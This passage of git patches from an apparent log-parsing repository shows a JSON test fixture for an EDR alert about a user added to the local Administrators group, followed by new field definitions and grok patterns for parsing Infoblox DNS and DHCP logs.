\"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}", + "sekoiaio": { + "intake": { + "dialect": "HarfangLab EDR", + "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2" + } + } + }, + "expected": { + "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: 
S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate 
administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": \"11111111-2222-3333-4444-555555555555\"}, {\"name\": \"Postes de travail : Lot 3\", \"id\": \"66666666-7777-8888-9999-000000000000\"}], \"status\": \"new\", \"execution\": 0, \"agent\": {\"agentid\": \"11111111-aaaa-2222-bbbb-333333333333\", \"domain\": null, \"osproducttype\": \"Windows 10 Enterprise\", \"ostype\": \"windows\", \"dnsdomainname\": \"domain.com\", \"distroid\": null, \"domainname\": \"NT_DOMAIN\", \"osversion\": \"10.0.19045\", \"hostname\": \"PC01\", \"version\": \"4.1.6\", \"additional_info\": {}}, \"threat_key\": \"20528\", \"mitre_cells\": [\"persistence__t1078.003\", \"persistence__t1098\", \"privilege-escalation__t1078.003\", \"privilege-escalation__t1098\"], \"alert_unique_id\": \"aaaaaaaa-1111-bbbb-2222-cccccccccccc\", \"log_type\": \"alert\", \"@version\": \"1\", \"msg\": \"Detects when a user account is added into the local 
Administrators group.\\n This action can be the result of a malicious activity.\", \"alert_subtype\": \"eventlog\", \"detection_origin\": \"agent\"}",
+ "event": {
+ "dataset": "alert",
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2024-11-12T08:39:14.017000Z",
+ "action": {
+ "properties": {
+ "MemberName": "DOEJ",
+ "SubjectDomainName": "NT_DOMAIN",
+ "SubjectLogonId": "0x1234567",
+ "SubjectUserName": "sw-suser",
+ "SubjectUserSid": "S-1-2-4-5-6",
+ "TargetDomainName": "Builtin",
+ "TargetSid": "S-1-2-3-4",
+ "TargetUserName": "Administrateurs"
+ }
+ },
+ "agent": {
+ "id": "11111111-aaaa-2222-bbbb-333333333333",
+ "name": "harfanglab"
+ },
+ "harfanglab": {
+ "aggregation_key": "8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb",
+ "alert_subtype": "eventlog",
+ "alert_time": "2024-11-12T08:39:14.017+00:00",
+ "alert_unique_id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc",
+ "execution": 0,
+ "groups": [
+ "{\"id\": \"11111111-2222-3333-4444-555555555555\", \"name\": \"Postes de travail\"}",
+ "{\"id\": \"66666666-7777-8888-9999-000000000000\", \"name\": \"Postes de travail : Lot 3\"}"
+ ],
+ "level": "medium",
+ "status": "new"
+ },
+ "host": {
+ "domain": "NT_DOMAIN",
+ "hostname": "PC01",
+ "name": "PC01",
+ "os": {
+ "full": "Windows 10 Enterprise",
+ "version": "10.0.19045"
+ }
+ },
+ "log": {
+ "hostname": "PC01"
+ },
+ "organization": {
+ "id": "3b37ffc8520ef542"
+ },
+ "related": {
+ "hosts": [
+ "PC01"
+ ],
+ "user": [
+ "sw-suser"
+ ]
+ },
+ "rule": {
+ "category": "sigma",
+ "description": "Detects when a user account is added into the local Administrators group.\n This action can be the result of a malicious activity.",
+ "id": "12345678-abcd-ef90-1234-123456abcdef",
+ "name": "User Account Added to the Local Administrators Group"
+ },
+ "user": {
+ "domain": "NT_DOMAIN",
+ "name": "sw-suser",
+ "roles": "Postesdetravail,Postesdetravail:Lot3",
+ "target": {
+ "domain": "Builtin",
+ "name": "Administrateurs"
+ }
+ }
+ }
+}
\ No newline at
end of file From 78a93392d672511ff0b2fcfe0c421bb0eeb43414 Mon Sep 17 00:00:00 2001 
From: vg-svitla Date: Fri, 29 Nov 2024 12:44:41 +0200 Subject: [PATCH 106/150] Fix: Infoblox DDI format improvement --- Infoblox/ddi/_meta/fields.yml | 35 +++++++ Infoblox/ddi/ingest/parser.yml | 120 +++++++++++++++++++++-- Infoblox/ddi/tests/query_log_dhcp_1.json | 32 ++++++ Infoblox/ddi/tests/query_log_dhcp_2.json | 32 ++++++ Infoblox/ddi/tests/query_log_dhcp_3.json | 31 ++++++ Infoblox/ddi/tests/query_log_dhcp_4.json | 38 +++++++ Infoblox/ddi/tests/query_log_dhcp_5.json | 33 +++++++ Infoblox/ddi/tests/query_log_dhcp_6.json | 32 ++++++ Infoblox/ddi/tests/query_log_dhcp_7.json | 32 ++++++ Infoblox/ddi/tests/query_log_dhcp_8.json | 27 +++++ Infoblox/ddi/tests/query_log_dns_1.json | 36 +++++++ Infoblox/ddi/tests/query_log_dns_2.json | 33 +++++++ Infoblox/ddi/tests/query_log_dns_3.json | 33 +++++++ Infoblox/ddi/tests/query_log_dns_4.json | 34 +++++++ Infoblox/ddi/tests/query_log_dns_5.json | 34 +++++++ Infoblox/ddi/tests/query_log_dns_6.json | 34 +++++++ Infoblox/ddi/tests/query_log_dns_7.json | 33 +++++++ Infoblox/ddi/tests/query_log_dns_8.json | 33 +++++++ Infoblox/ddi/tests/query_log_dns_9.json | 35 +++++++ 19 files changed, 710 insertions(+), 7 deletions(-) create mode 100644 Infoblox/ddi/tests/query_log_dhcp_1.json create mode 100644 Infoblox/ddi/tests/query_log_dhcp_2.json create mode 100644 Infoblox/ddi/tests/query_log_dhcp_3.json create mode 100644 Infoblox/ddi/tests/query_log_dhcp_4.json create mode 100644 Infoblox/ddi/tests/query_log_dhcp_5.json create mode 100644 Infoblox/ddi/tests/query_log_dhcp_6.json create mode 100644 Infoblox/ddi/tests/query_log_dhcp_7.json create mode 100644 Infoblox/ddi/tests/query_log_dhcp_8.json create mode 100644 Infoblox/ddi/tests/query_log_dns_1.json create mode 100644 Infoblox/ddi/tests/query_log_dns_2.json create mode 100644 Infoblox/ddi/tests/query_log_dns_3.json create mode 100644 Infoblox/ddi/tests/query_log_dns_4.json create mode 100644 Infoblox/ddi/tests/query_log_dns_5.json create mode 100644 
Infoblox/ddi/tests/query_log_dns_6.json create mode 100644 Infoblox/ddi/tests/query_log_dns_7.json create mode 100644 Infoblox/ddi/tests/query_log_dns_8.json create mode 100644 Infoblox/ddi/tests/query_log_dns_9.json
diff --git a/Infoblox/ddi/_meta/fields.yml b/Infoblox/ddi/_meta/fields.yml
index 064d69713..69f6818da 100644
--- a/Infoblox/ddi/_meta/fields.yml
+++ b/Infoblox/ddi/_meta/fields.yml
@@ -2,3 +2,38 @@ infoblox.ddi.category:
description: The logging category of this event.
name: infoblox.ddi.category
type: keyword
+
+infoblox.dhcp.circuit_id:
+ description: The circuit ID.
+ name: infoblox.dhcp.circuit_id
+ type: keyword
+
+infoblox.dhcp.interface_ip:
+ description: The IP address of the interface.
+ name: infoblox.dhcp.interface_ip
+ type: ip
+
+infoblox.dhcp.lease_message:
+ description: The lease message.
+ name: infoblox.dhcp.lease_message
+ type: keyword
+
+infoblox.dhcp.lease_time:
+ description: The lease time.
+ name: infoblox.dhcp.lease_time
+ type: keyword
+
+infoblox.dhcp.request_message:
+ description: The request message.
+ name: infoblox.dhcp.request_message
+ type: keyword
+
+infoblox.dhcp.router_ip:
+ description: The IP address of the router.
+ name: infoblox.dhcp.router_ip
+ type: ip
+
+infoblox.dhcp.trans_id:
+ description: The transaction ID.
+ name: infoblox.dhcp.trans_id
+ type: keyword
diff --git a/Infoblox/ddi/ingest/parser.yml b/Infoblox/ddi/ingest/parser.yml
index 25264fc22..2fb950af6 100644
--- a/Infoblox/ddi/ingest/parser.yml
+++ b/Infoblox/ddi/ingest/parser.yml
@@ -5,7 +5,7 @@ pipeline: name: grok.match properties: output_field: message - pattern: "%{CLIENT}" + pattern: "%{DNS_FORMERR}|%{DNS_OTHER}|%{DNS_0}|%{DNS_1}|%{DNS_2}|%{DNS_3}|%{DNS_4}|%{DNS_5}|%{DNS_6}|%{DNS_7}|%{DNS_8}|%{DNS_9}|%{DNS_10}|%{DNS_11}|%{DNS_12}|%{DNS_13}" custom_patterns: QUERY_FLAGS: "%{QUERY_FLAGS_RD:flags_rd}%{QUERY_FLAGS_EDNS:flags_edns}?%{QUERY_FLAGS_TCP:flags_tcp}?%{QUERY_FLAGS_DNSSEC:flags_dnssec}?%{QUERY_FLAGS_CD:flags_cd}?%{QUERY_FLAGS_DNS_SERVER_COOKIE}?%{QUERY_FLAGS_DNS_SERVER_COOKIE_WITHOUT_VALID_SERVER}?" QUERY_FLAGS_RD: '[\+\-]' 
@@ -16,22 +16,128 @@ pipeline: QUERY_FLAGS_CD: "C" QUERY_FLAGS_DNS_SERVER_COOKIE: "V" QUERY_FLAGS_DNS_SERVER_COOKIE_WITHOUT_VALID_SERVER: "K" - CLIENT: '(%{WORD:category}: )?client ?(%{DATA}) %{IP:src}#%{INT:spt} (%{DATA}): query: %{IPORHOST:dns_question_name} %{WORD:dns_question_class} %{WORD:dns_question_type} %{QUERY_FLAGS} \(%{IP}\)' + CLIENT: "client (?:%{DATA} )?%{IP:client_ip}#%{NUMBER:client_port}:?" + VIEW: "view %{DATA:infoblox_nios_log_view}: " + + # Next patterns are inspired by + # https://github.com/elastic/integrations/blob/main/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/pipeline_dns.yml + DNS_1: "zone %{DATA:dns_question_name}/%{DATA:dns_question_class}: notify from %{IP:client_ip}#%{NUMBER:client_port}:? %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_2: "transfer of '%{DATA:dns_question_name}/%{DATA:dns_question_class}' from %{IP:client_ip}#%{NUMBER:client_port}:? %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_3: "validating %{DATA:dns_question_name}/%{WORD:dns_question_type}: %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_4: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} updating zone '%{DATA:dns_question_name}/%{DATA:dns_question_class}': %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_5: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA}\\): %{VIEW}?query failed %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_6: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA:infoblox_nios_log_dns_before_query}\\): rewriting query name %{DATA} to '%{DATA:infoblox_nios_log_dns_after_query}', type %{DATA:dns_question_type}" + DNS_7: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA}\\): %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} %{DATA:infoblox_nios_log_dns_header_flags} \\(%{IP:server_ip}\\)" + DNS_8: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} %{DATA:network_transport}: 
%{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags}" + DNS_9: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} \\(%{DATA}\\): transfer of '%{DATA:dns_question_name}/%{DATA:dns_question_class}': %{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_10: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*CEF:0\\|Infoblox\\|NIOS\\|%{GREEDYDATA:infoblox_nios_log_dns_version}\\|RPZ-%{DATA:dns_answers_type}\\|%{DATA:infoblox_nios_log_dns_answers_policy}\\|\\d+\\|app=DNS dst=%{IP:server_ip} src=%{IP:client_ip} spt=%{NUMBER:client_port} view=%{DATA:infoblox_nios_log_dns_view_name} qtype=%{WORD:dns_question_type} msg=%{GREEDYDATA:infoblox_nios_log_dns_message}" + DNS_11: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{GREEDYDATA:_tmp_timestamp} %{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags} %{GREEDYDATA:repeat_message}" + DNS_12: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{GREEDYDATA:_tmp_timestamp} %{CLIENT} %{DATA:network_transport}: %{VIEW}?query: %{DATA:dns_question_name} %{DATA:dns_question_class} %{WORD:dns_question_type} response: %{DATA:dns_response_code} %{DATA:infoblox_nios_log_dns_header_flags}" + DNS_13: "(%{NOTSPACE:infoblox_nios_log_dns_category}:)?\\s*%{CLIENT} %{GREEDYDATA:infoblox_nios_log_dns_message}" + + # Original pattern + DNS_0: '(%{WORD:infoblox_nios_log_dns_category}: )?client ?(%{DATA}) %{IP:client_ip}#%{INT:client_port} (%{DATA}): query: %{DATA:dns_question_name} %{WORD:dns_question_class} %{WORD:dns_question_type} %{QUERY_FLAGS} \(%{IP}\)' + + # Other patterns + + ## For DNS message like: + ## FORMERR resolving 'test.testing.io/AAAA/IN': 192.168.1.136#53 + DNS_FORMERR: "%{WORD:event_action} resolving 
'%{DATA:dns_question_name}/%{DATA:dns_question_type}/%{DATA:dns_question_class}': %{IP:client_ip}#%{NUMBER:client_port}" + + ## For other message like: + ## r-l-e:192.168.1.113,Fixed,P76984,c4:d0:e3:b4:08:4d,1732119022,1732291822,,$ + DNS_OTHER: "r-l-e:%{IP:client_ip},%{DATA:infoblox_nios_log_dns_category},%{DATA:infoblox_nios_log_dns_client_hostname},%{MAC:client_mac},%{NUMBER:infoblox_nios_log_dns_lease_start},%{NUMBER:infoblox_nios_log_dns_lease_end},%{GREEDYDATA:infoblox_nios_log_dns_message}" + + - name: parse_event + filter: "{{'REQUEST DHCP' in original.message or 'DHCPREQUEST' in original.message}}" + external: + name: grok.match + properties: + output_field: message + pattern: "%{DHCP_1}|%{DHCP_2}|%{DHCP_3}|%{DHCP_4}|%{DHCP_5}|%{DHCP_6}|%{DHCP_7}|%{DHCP_8}|%{DHCP_9}|%{DHCP_10}|%{DHCP_11}|%{DHCP_12}|%{DHCP_OTHER}" + custom_patterns: + DHCP_1: '%{WORD:event_action} for %{IP:client_ip} \(%{IP:infoblox_nios_log_dhcp_router_ip}\) from %{MAC:client_mac} \(%{DATA:infoblox_nios_log_dhcp_client_hostname}\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} uid %{DATA:infoblox_nios_log_dhcp_uid} \(%{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}\)' + DHCP_2: '%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} \(%{DATA:infoblox_nios_log_dhcp_client_hostname}\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} uid %{DATA:infoblox_nios_log_dhcp_uid} \(%{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}\)' + DHCP_3: '%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} \(%{DATA:infoblox_nios_log_dhcp_client_hostname}\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} uid %{DATA:infoblox_nios_log_dhcp_uid}: %{GREEDYDATA:infoblox_nios_log_dhcp_request_message}' + DHCP_4: '%{WORD:event_action} 
for %{IP:client_ip} \(%{IP:infoblox_nios_log_dhcp_router_ip}\) from %{MAC:client_mac} \(%{DATA:infoblox_nios_log_dhcp_client_hostname}\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}' + DHCP_5: '%{WORD:event_action} for %{IP:client_ip} \(%{IP:infoblox_nios_log_dhcp_router_ip}\) from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} \(%{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}\)' + DHCP_6: '%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} uid %{DATA:infoblox_nios_log_dhcp_uid} \(%{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}\)' + DHCP_7: '%{WORD:event_action} for %{IP:client_ip} \(%{IP:infoblox_nios_log_dhcp_router_ip}\) from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id}: %{GREEDYDATA:infoblox_nios_log_dhcp_request_message}' + DHCP_8: "%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id}: %{GREEDYDATA:infoblox_nios_log_dhcp_request_message}" + DHCP_9: '%{WORD:event_action} for %{IP:client_ip} \(%{IP:infoblox_nios_log_dhcp_router_ip}\) from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{GREEDYDATA:infoblox_nios_log_dhcp_trans_id}' + DHCP_10: "%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{DATA:infoblox_nios_log_dhcp_trans_id} uid 
%{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCP_11: "%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) TransID %{GREEDYDATA:infoblox_nios_log_dhcp_trans_id}" + DHCP_12: "%{WORD:event_action} for %{IP:client_ip} from %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name})" + + # Other patterns + + ## For DHCP message like: + ## Option 82: received a REQUEST DHCP packet from relay-agent eth2 with a circuit-id of "1a:02:30:00:00:00:00:76:00:00:00:00:00:00:2a:f0", a remote-id of "0a:44:70:46" for 192.168.1.222 (00:50:56:ae:b3:44) lease time is undefined seconds. (NEW) + DHCP_OTHER: 'Option %{NUMBER}: received a %{DATA:event_action} packet from %{NOTSPACE} %{DATA:infoblox_nios_log_dhcp_relay_interface_name} with a circuit-id of \"%{DATA:infoblox_nios_log_dhcp_circuit_id}\", a remote-id of \"%{DATA:infoblox_nios_log_dhcp_remote_id}\" for %{IP:client_ip} \(%{MAC:client_mac}\) lease time is %{DATA:infoblox_nios_log_dhcp_lease_time} seconds. 
\(%{DATA:infoblox_nios_log_dhcp_lease_message}\)' + + - name: parse_event + filter: "{{'DHCPACK' in original.message}}" + external: + name: grok.match + properties: + output_field: message + pattern: "%{DHCPACK_1}|%{DHCPACK_2}|%{DHCPACK_3}|%{DHCPACK_4}|%{DHCPACK_5}|%{DHCPACK_6}|%{DHCPACK_7}|%{DHCPACK_8}|%{DHCPACK_9}|%{DHCPACK_10}|%{DHCPACK_11}|%{DHCPACK_12}" + custom_patterns: + # Patterns are inspired by + # https://github.com/elastic/integrations/blob/main/packages/infoblox_nios/data_stream/log/elasticsearch/ingest_pipeline/pipeline_dhcp.yml + DHCPACK_1: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} \\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} offered-duration %{NUMBER:infoblox_nios_log_dhcp_offered_duration} \\(%{DATA:infoblox_nios_log_dhcp_message}\\) uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCPACK_2: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} offered-duration %{NUMBER:infoblox_nios_log_dhcp_offered_duration} \\(%{DATA:infoblox_nios_log_dhcp_message}\\) uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCPACK_3: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} \\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} 
\\(%{DATA:infoblox_nios_log_dhcp_lease_message}\\) uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCPACK_4: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} \\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} offered-duration %{NUMBER:infoblox_nios_log_dhcp_offered_duration} \\(%{DATA:infoblox_nios_log_dhcp_message}\\)" + DHCPACK_5: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} \\(%{DATA:infoblox_nios_log_dhcp_lease_message}\\) uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCPACK_6: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} \\(%{DATA:infoblox_nios_log_dhcp_lease_message}\\)" + DHCPACK_7: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} \\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} \\(%{GREEDYDATA:infoblox_nios_log_dhcp_lease_message}\\)" + DHCPACK_8: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} \\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\\) via 
(%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCPACK_9: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} \\(%{DATA:infoblox_nios_log_dhcp_client_hostname}\\) via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{GREEDYDATA:infoblox_nios_log_dhcp_lease_duration}" + DHCPACK_10: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) lease-duration %{NUMBER:infoblox_nios_log_dhcp_lease_duration} uid %{GREEDYDATA:infoblox_nios_log_dhcp_uid}" + DHCPACK_11: "%{WORD:event_action} on %{IP:client_ip} to %{MAC:client_mac} via (%{IP:infoblox_nios_log_dhcp_interface_ip}|%{WORD:observer_ingress_interface_name}) relay (%{IP:infoblox_nios_log_dhcp_relay_interface_ip}|%{WORD:infoblox_nios_log_dhcp_relay_interface_name}) 